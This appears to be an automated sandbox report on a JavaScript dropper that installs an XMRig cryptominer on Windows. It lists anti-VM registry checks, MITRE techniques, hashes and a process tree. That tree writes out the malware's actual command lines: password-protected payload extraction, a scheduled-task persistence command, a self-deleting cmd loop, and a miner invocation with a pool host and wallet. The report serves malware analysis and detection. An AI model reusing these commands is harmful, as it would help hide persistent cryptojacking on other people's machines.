xmrig | 4e0ddcd303f27c01dcc8a35a9bd821c53fb7dcca474ac7f0c84d3c6451e9f778

Resubmissions

09-04-2024 13:34

240409-qvlrtabe9s 10

09-04-2024 13:34

09-04-2024 13:33

09-04-2024 13:33

07-07-2023 11:45

Analysis

max time kernel
379s
max time network
1190s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
14-04-2024 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MsMpEng.js
Size

24.2MB
MD5

690d57b0d8670391bad0876cae078bab
SHA1

32bea01d606128c606b71e19920099c6cb15030f
SHA256

b27dd5407a22c8df93090fbc1a3eb93c6461f4a279cfabd87b4b21e246bda458
SHA512

dd113765cd5cfeb99a98775c3c8e265463fca7863ffa519dcb7175312bbbeb4ea24ca45b4cef0320b430d413c020970346f4db671e0730e9e044cd2585f71fd4
SSDEEP

49152:34aSO/UYGzBMZ09d1X5EdS76+B0RX8DQQs8ReDlpgU3HApVeOGMmb5cUNWcGTRPk:H

Score

10^/10

xmrig evasion miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	x.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral17/memory/532-3325-0x0000000000190000-0x0000000000CA1000-memory.dmp	xmrig
behavioral17/memory/532-3339-0x0000000000190000-0x0000000000CA1000-memory.dmp	xmrig

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x.exe

Executes dropped EXE 22 IoCs

pid	Process
2204	x.exe
2680	CL_Debug_Log.txt
532	Helper.exe
464	Helper.exe
2792	Helper.exe
1316	Helper.exe
2292	tor.exe
2504	Helper.exe
1688	Helper.exe
2572	Helper.exe
2764	Helper.exe
2560	Helper.exe
1520	Helper.exe
2388	Helper.exe
1128	Helper.exe
1664	Helper.exe
1052	Helper.exe
1876	Helper.exe
732	Helper.exe
288	Helper.exe
900	Helper.exe
2148	Helper.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Wine	x.exe

Loads dropped DLL 13 IoCs

pid	Process
2204	x.exe
2480	taskeng.exe
2480	taskeng.exe
1476	Process not Found
2792	Helper.exe
2792	Helper.exe
2292	tor.exe
2292	tor.exe
2292	tor.exe
2292	tor.exe
2292	tor.exe
2292	tor.exe
2784	Process not Found

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral17/memory/2204-7-0x0000000000E10000-0x0000000002036000-memory.dmp	autoit_exe
behavioral17/files/0x0006000000016cf2-31.dat	autoit_exe
behavioral17/files/0x0007000000016cde-37.dat	autoit_exe
behavioral17/memory/2204-40-0x0000000000E10000-0x0000000002036000-memory.dmp	autoit_exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2792 set thread context of 1316	2792	Helper.exe	44
PID 2792 set thread context of 1876	2792	Helper.exe	58
PID 2792 set thread context of 532	2792	Helper.exe	61

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2532	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1864	timeout.exe
368	timeout.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\UEITMFAB\root\CIMV2	Helper.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
468	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	2680	CL_Debug_Log.txt
Token: 35	2680	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2680	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2680	CL_Debug_Log.txt
Token: SeRestorePrivilege	1316	Helper.exe
Token: 35	1316	Helper.exe
Token: SeSecurityPrivilege	1316	Helper.exe
Token: SeSecurityPrivilege	1316	Helper.exe
Token: SeRestorePrivilege	1876	Helper.exe
Token: 35	1876	Helper.exe
Token: SeSecurityPrivilege	1876	Helper.exe
Token: SeSecurityPrivilege	1876	Helper.exe
Token: SeLockMemoryPrivilege	532	attrib.exe
Token: SeLockMemoryPrivilege	532	attrib.exe

Suspicious use of FindShellTrayWindow 47 IoCs

pid	Process
2204	x.exe
2204	x.exe
2204	x.exe
532	Helper.exe
532	Helper.exe
532	Helper.exe
464	Helper.exe
464	Helper.exe
464	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2504	Helper.exe
2504	Helper.exe
2504	Helper.exe
1688	Helper.exe
1688	Helper.exe
1688	Helper.exe
2572	Helper.exe
2572	Helper.exe
2572	Helper.exe
2560	Helper.exe
2560	Helper.exe
2560	Helper.exe
2764	Helper.exe
2764	Helper.exe
2764	Helper.exe
2388	Helper.exe
2388	Helper.exe
2388	Helper.exe
1520	Helper.exe
1520	Helper.exe
1520	Helper.exe
1128	Helper.exe
1664	Helper.exe
1128	Helper.exe
1664	Helper.exe
1128	Helper.exe
1664	Helper.exe
1052	Helper.exe
1052	Helper.exe
1052	Helper.exe
532	attrib.exe
732	Helper.exe
732	Helper.exe
732	Helper.exe
288	Helper.exe

Suspicious use of SendNotifyMessage 46 IoCs

pid	Process
2204	x.exe
2204	x.exe
2204	x.exe
532	Helper.exe
532	Helper.exe
532	Helper.exe
464	Helper.exe
464	Helper.exe
464	Helper.exe
2792	Helper.exe
2792	Helper.exe
2792	Helper.exe
2504	Helper.exe
2504	Helper.exe
2504	Helper.exe
1688	Helper.exe
1688	Helper.exe
1688	Helper.exe
2572	Helper.exe
2572	Helper.exe
2572	Helper.exe
2560	Helper.exe
2560	Helper.exe
2560	Helper.exe
2764	Helper.exe
2764	Helper.exe
2764	Helper.exe
2388	Helper.exe
2388	Helper.exe
2388	Helper.exe
1520	Helper.exe
1520	Helper.exe
1520	Helper.exe
1128	Helper.exe
1664	Helper.exe
1128	Helper.exe
1664	Helper.exe
1664	Helper.exe
1128	Helper.exe
1052	Helper.exe
1052	Helper.exe
1052	Helper.exe
732	Helper.exe
732	Helper.exe
732	Helper.exe
288	Helper.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2204	2368	wscript.exe	28
PID 2368 wrote to memory of 2204	2368	wscript.exe	28
PID 2368 wrote to memory of 2204	2368	wscript.exe	28
PID 2368 wrote to memory of 2204	2368	wscript.exe	28
PID 2204 wrote to memory of 2680	2204	x.exe	29
PID 2204 wrote to memory of 2680	2204	x.exe	29
PID 2204 wrote to memory of 2680	2204	x.exe	29
PID 2204 wrote to memory of 2680	2204	x.exe	29
PID 2204 wrote to memory of 2432	2204	x.exe	31
PID 2204 wrote to memory of 2432	2204	x.exe	31
PID 2204 wrote to memory of 2432	2204	x.exe	31
PID 2204 wrote to memory of 2432	2204	x.exe	31
PID 2432 wrote to memory of 2532	2432	cmd.exe	33
PID 2432 wrote to memory of 2532	2432	cmd.exe	33
PID 2432 wrote to memory of 2532	2432	cmd.exe	33
PID 2432 wrote to memory of 2532	2432	cmd.exe	33
PID 2204 wrote to memory of 2036	2204	x.exe	34
PID 2204 wrote to memory of 2036	2204	x.exe	34
PID 2204 wrote to memory of 2036	2204	x.exe	34
PID 2204 wrote to memory of 2036	2204	x.exe	34
PID 2036 wrote to memory of 1864	2036	cmd.exe	36
PID 2036 wrote to memory of 1864	2036	cmd.exe	36
PID 2036 wrote to memory of 1864	2036	cmd.exe	36
PID 2036 wrote to memory of 1864	2036	cmd.exe	36
PID 2036 wrote to memory of 368	2036	cmd.exe	37
PID 2036 wrote to memory of 368	2036	cmd.exe	37
PID 2036 wrote to memory of 368	2036	cmd.exe	37
PID 2036 wrote to memory of 368	2036	cmd.exe	37
PID 2480 wrote to memory of 464	2480	taskeng.exe	41
PID 2480 wrote to memory of 464	2480	taskeng.exe	41
PID 2480 wrote to memory of 464	2480	taskeng.exe	41
PID 2480 wrote to memory of 532	2480	taskeng.exe	42
PID 2480 wrote to memory of 532	2480	taskeng.exe	42
PID 2480 wrote to memory of 532	2480	taskeng.exe	42
PID 532 wrote to memory of 2792	532	Helper.exe	43
PID 532 wrote to memory of 2792	532	Helper.exe	43
PID 532 wrote to memory of 2792	532	Helper.exe	43
PID 2792 wrote to memory of 1316	2792	Helper.exe	44
PID 2792 wrote to memory of 1316	2792	Helper.exe	44
PID 2792 wrote to memory of 1316	2792	Helper.exe	44
PID 2792 wrote to memory of 1316	2792	Helper.exe	44
PID 2792 wrote to memory of 1316	2792	Helper.exe	44
PID 2792 wrote to memory of 2292	2792	Helper.exe	46
PID 2792 wrote to memory of 2292	2792	Helper.exe	46
PID 2792 wrote to memory of 2292	2792	Helper.exe	46
PID 2480 wrote to memory of 2504	2480	taskeng.exe	48
PID 2480 wrote to memory of 2504	2480	taskeng.exe	48
PID 2480 wrote to memory of 2504	2480	taskeng.exe	48
PID 2480 wrote to memory of 1688	2480	taskeng.exe	49
PID 2480 wrote to memory of 1688	2480	taskeng.exe	49
PID 2480 wrote to memory of 1688	2480	taskeng.exe	49
PID 2504 wrote to memory of 2572	2504	Helper.exe	50
PID 2504 wrote to memory of 2572	2504	Helper.exe	50
PID 2504 wrote to memory of 2572	2504	Helper.exe	50
PID 2480 wrote to memory of 2764	2480	taskeng.exe	51
PID 2480 wrote to memory of 2764	2480	taskeng.exe	51
PID 2480 wrote to memory of 2764	2480	taskeng.exe	51
PID 2480 wrote to memory of 2560	2480	taskeng.exe	52
PID 2480 wrote to memory of 2560	2480	taskeng.exe	52
PID 2480 wrote to memory of 2560	2480	taskeng.exe	52
PID 2560 wrote to memory of 1520	2560	Helper.exe	53
PID 2560 wrote to memory of 1520	2560	Helper.exe	53
PID 2560 wrote to memory of 1520	2560	Helper.exe	53
PID 2764 wrote to memory of 2388	2764	Helper.exe	54

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
532	attrib.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\MsMpEng.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\x.exe
  "C:\Users\Admin\AppData\Local\Temp\x.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
    C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      Creates scheduled task(s)
      PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\x.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\x.exe" exit)
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2036
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1864
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:368

C:\Windows\system32\taskeng.exe
taskeng.exe {4DBD31A7-CDD1-455D-96B7-44135F32791A} S-1-5-21-2610426812-2871295383-373749122-1000:UEITMFAB\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:464
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1316
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2292
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1876
  - - C:\Windows\System32\attrib.exe
      -a RandomX -o stratum+tcp://xmr.2miners.com:2222 -u 8BayjhYeujm9whuyNMsrd46tWdEd4JfAPfq6nXn1S4zrLzB9dduLbPuFPb3M2ZRFtfa6Zugfv5643AuBbmP8PDHaS3hQDdi.fhaw -p x -t 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Views/modifies file attributes
      PID:532
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2572
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1688
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2388
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2560
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1520
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1128
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1664
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1052
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:732
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2864
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:288
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  PID:900
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:1716
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  PID:2148
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2532
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2568
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2432
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1008
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2296
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1952
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2032
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1632
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:1796
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:3036
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2876
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1072
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2168
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2648
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:240
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1592
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2776
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1932
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2616
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2760
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:1492
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2796
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:1984
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2512
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2300
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:752
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2524
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1140
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1712
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2672
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:1588
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2980
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2816
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2072
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2668
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
    3⤵
    PID:2888
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:300
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32.exe

Filesize
7.4MB

MD5
7f9e6ee81558b38fbe276f60949d38b9

SHA1
6358b944b0515b04da8fe7fda7dc3dbbfb82423c

SHA256
6cd0a0976cff64c5287c166b73e5c877f026274f85599344756c47e9aa756bcb

SHA512
960966cc6254f15d5653ec9dbfe0fdc6725f2c1209b4ddb8b1c68d8f646521340f91029a53a5c8c60c9f813f3fe3e83644b052913178ac75886ccbd894be9ce3

Download Submit
C:\Users\Admin\AppData\Local\Temp\64.exe

Filesize
8.4MB

